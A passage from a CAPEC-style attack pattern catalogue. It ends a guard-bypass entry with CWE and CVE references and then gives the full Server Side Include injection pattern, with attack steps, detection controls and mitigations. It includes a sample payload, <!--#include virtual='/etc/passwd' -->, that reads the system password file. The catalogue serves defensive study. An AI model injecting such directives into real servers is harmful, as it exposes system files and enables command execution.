In the case that guard functionality exists client-side, the attacker will likely require reverse-engineering tools, such as a dissasembler. | | Probing Techniques | Attackers may confine (and succeeed with) probing as simple as exploring an application's functionality and its underlying mapping to server-side components. It is likely that for this to succeed, the Attacker will need a valid login. At the other extreme, Attackers capable of reverse engineering client code will have the ability to remove functionality or identify the whereabouts of sensitive data through whitebox analysis, such as review of reverse-engineered code. | | Attack Motivation-Consequences | - Privilege Escalation
- Information Leakage
- Data Modification
| | Context Description | This pattern of attacks possesses valid contexts regardless of architectural model, provided that the application's developers have implemented a guard component. Guards may be implemented as application logic (such as in the 'Controller' element of the MVC pattern), may themselves be an enclosing object (such as Java's SealedObject class), or could be client-side functionality. The guard may mitigate access (by making an authorization decision, could filter input (or normalize/sensor output), or could conduct some set of security checks.
Client/server, n-tier and thick clients should all be considered for vulnerability to this pattern. However, the exposure of a guard to attack depends on the ability of the Attacker to identify and probe it and its surroundings, as well as the ability to access it logically. This makes this style of attack more difficult in n-tier applications in which the guard under attack is a properly implemented 'controller'.
This pattern of attack need not depend on a particular platform, technology stack, or language. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 288 | Authentication Bypass Using an Alternate Path or Channel | Targeted | | 372 | Incomplete Internal State Distinction | Secondary | | 510 | Trapdoor | Targeted | | 693 | Protection Mechanism Failure | Targeted | | 721 | OWASP Top Ten 2007 Category A10 - Failure to Restrict URL Access | Targeted |
| | Related Vulnerabilities | | Vulnerability-ID | Vulnerability Description |
|---|
| CVE-2007-0968 | Unspecified vulnerability in Cisco Firewall Services Module (FWSM) before 2.3(4.7) and 3.x before 3.1(3.1) causes the access control entries (ACE) in an ACL to be improperly evaluated, which allows remote authenticated users to bypass intended certain ACL protections. | | CVE-2007-0802 | Mozilla Firefox 2.0.0.1 allows remote attackers to bypass the Phishing Protection mechanism by adding certain characters to the end of the domain name, as demonstrated by the "." and "/" characters, which is not caught by the Phishing List blacklist filter. | | VU#258834 | WebEOC ties privileges and roles to client-side resources. If an attacker can access a resource directly, that attacker will be granted all the privileges associated with that resource. |
| | Related Security Principles | - Defense in Depth
- Complete Mediation
- Failing Securely
| | Related Guidelines | - Use Authentication Mechanisms, Where Appropriate, Correctly
- Use Authorization Mechanisms Correctly
| | Purpose | Penetration | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | High | Low |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| John Steven | Cigital, Inc | 2007-02-10 | Initial core pattern content |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Chiradeep B. Chhaya | Cigital, Inc | 2007-02-23 | Fleshed out pattern with extra content |
|
| Attack Pattern ID | Pattern Abstraction: Standard 101 | | Typical Severity | High | | Description | Summary An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands. Attack Execution Flow Explore Determine applicability: The attacker determines whether server side includes are enabled on the target web server. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Look for popular page file names. The attacker will look for .shtml, .shtm, .asp, .aspx, and other well known strings in URLs to help determine whether SSI functionality is enabled. | env-Web | | Fetch .htaccess file. In Apache web server installations, the .htaccess file may enable server side includes in specific locations. In those cases, the .htaccess file lives inside the directory where SSI is enabled, and is theoretically fetchable from the web server. Although most web servers deny fetching the .htaccess file, a misconfigured server will allow it. Thus, an attacker will frequently try it. | env-Web |
| Indicators of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c101s1i1 | Positive | If .htaccess files are used, their contents should be checked for "Options Includes" or "Options IncludesNOEXEC". | env-Web | | c101s1i2 | Positive | If apache is used, the contents of the httpd.conf file and similar configuration files should be checked for "Options Includes" or "Options IncludesNOEXEC". | env-Web | | c101s1i3 | Positive | IIS configurations contain server-side include compatibility. | env-Web | | c101s1i4 | Inconclusive | Web pages that include mundane, but dynamic information (like the current date, a file's size, or some other data that SSI can produce) might be producing that content through SSI. | env-Web |
| Security
Control |
|---|
| ID | Type | Description |
|---|
| c101s1s1 | Preventative | Adding "AllowOverrides none" to the main httpd.conf file on an server (and the similar restrictions in other application servers) can prevent unexpected loosening of SSI functionality, even by internal developers. |
Attempt SSI: Look for user controllable input, including HTTP headers, that can carry server side include directives to the web server | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL. | env-Web | | Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms. | env-Web |
| Indicators of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c101s2i1 | Positive | URL parameters are used. | env-Web | | c101s2i2 | Inconclusive | No parameters appear on the URL. Even though none appear, the web application may still use them if they are provided. | env-Web |
| Outcome |
|---|
| ID | Type | Description |
|---|
| c101s2o1 | Success | A list of URLs, with their corresponding parameters is created by the attacker. |
| Security
Controls |
|---|
| ID | Type | Description |
|---|
| c101s2s1 | Detective | Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). | | c101s2s2 | Detective | Create links on some pages that are visually hidden from web browsers. Using IFRAMES, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. | | c101s2s3 | Preventative | Actively monitor the application and either deny or redirect requests from origins that appear to be automated. |
Inject SSI: The attacker may then need to view a particular page in order to have the server execute the include directive and run a command or open a file on behalf of the attacker | Outcomes |
|---|
| ID | Type | Description |
|---|
| c101s3o1 | Success | The attacker views data (perhaps from a file) that he normally should not see. | | c101s3o2 | Success | The attacker executes a command on the server, or influences the arguments to a command executed via SSI on the server. |
| | Attack Prerequisites | A web server that supports server side includes and has them enabled User controllable input that can carry include directives to the web server | | Typical Likelihood of Exploit |
Very High
It is fairly easy to determine whether server-side includes are permitted on the target server. An attacker can potentially glean a lot of information if SSI Injection were found to be possible.
| | Methods of Attack | - Injection
- Protocol Manipulation
| | Examples-Instances | Description Consider a website hosted on a server that permits Server Side Includes (SSI), such as Apache with the "Options Includes" directive enabled.
Whenever an error occurs, the HTTP Headers along with the entire request are logged, which can then be displayed on a page that allows review of such errors. A malicious user can inject SSI directives in the HTTP Headers of a request designed to create an error.
When these logs are eventually reviewed, the server parses the SSI directives and executes them. | | Attacker Skill or Knowledge Required | Medium: The attacker needs to be aware of SSI technology, determine the nature of injection and be able to craft input that results in the SSI directives being executed. | | Resources Required | None: Determining whether the server supports SSI does not require special tools, and nor does injecting directives that get executed. | | Probing Techniques | The attacker can probe for enabled SSI by injecting content that can be interpreted as SSI directives and viewing the page output | | Solutions and Mitigations | Set the OPTIONS IncludesNOEXEC in the global access.conf file or local .htaccess (Apache) file to deny SSI execution in directories that do not need them All user controllable input must be appropriately sanitized before use in the application. This includes omitting, or encoding, certain characters or strings that have the potential of being interpreted as part of an SSI directive Server Side Includes must be enabled only if there is a strong business reason to do so. Every additional component enabled on the web server increases the attack surface as well as administrative overhead | | Attack Motivation-Consequences | - Information Leakage
- Run Arbitrary Code
| | Context Description | Server Side Include is a technology that allows having the server parse some code before rendering an HTML page, without having to take recourse in a full-fledged server side language.
This technology is usually used to display items such as "Last-Modified Date" or the current date and time on the server, and include other pieces of code, such as the output from a shell command or another html file. The latter is used to display things such as a common footer on HTML pages.
A special file extension, usually .shtml, is used for server-parsed documents. The date is then displayed as <!--#echo var="DATE_LOCAL" --> and a footer file, footer.html is included as <!--#include virtual="/footer.html" -->
However, for web sites that allow user-submitted content to be displayed on its pages, this is a potential minefield, since the user can easily insert the statement <!--#include virtual="/etc/passwd" --> to insert, and subsequently, view the password file on the machine.
The problems that cause SSI Injection are the same as those that cause Cross Site Scripting - lack of input validation and sanitization of the output. If content is appropriately encoded before being rendered, the server would not interpret it as SSI tags and would, therefore, not execute it. | | Injection Vector | User controllable input | | Payload | SSI directives that can cause disclosure of file contents or execution of commands | | Activation Zone | The web server that parses and executes SSI directives before rendering the HTML page | | Payload Activation Impact | The SSI directives cause the inclusion of certain file's contents or the execution of a shell command, as directed by the attacker | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 97 | Failure to Sanitize Server-Side Includes (SSI) Within a Web Page | Targeted | | 74 | Failure to Sanitize Data into a Different Plane (aka 'Injection') | Secondary | | 20 | Improper Input Validation | Secondary | | 713 | OWASP Top Ten 2007 Category A2 - Injection Flaws | Secondary |
| | Related Security Principles | - Reluctance To Trust
- Complete Mediation
| | Related Guidelines | - Never Use Unvalidated Input as Part of a Directive to any Internal Component
| | Purpose | Penetration Exploitation | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | High | High |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| Client-Server | All | All | All |
| | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| Chiradeep B. Chhaya | | 2007-04-20 | First Draft |
|
|
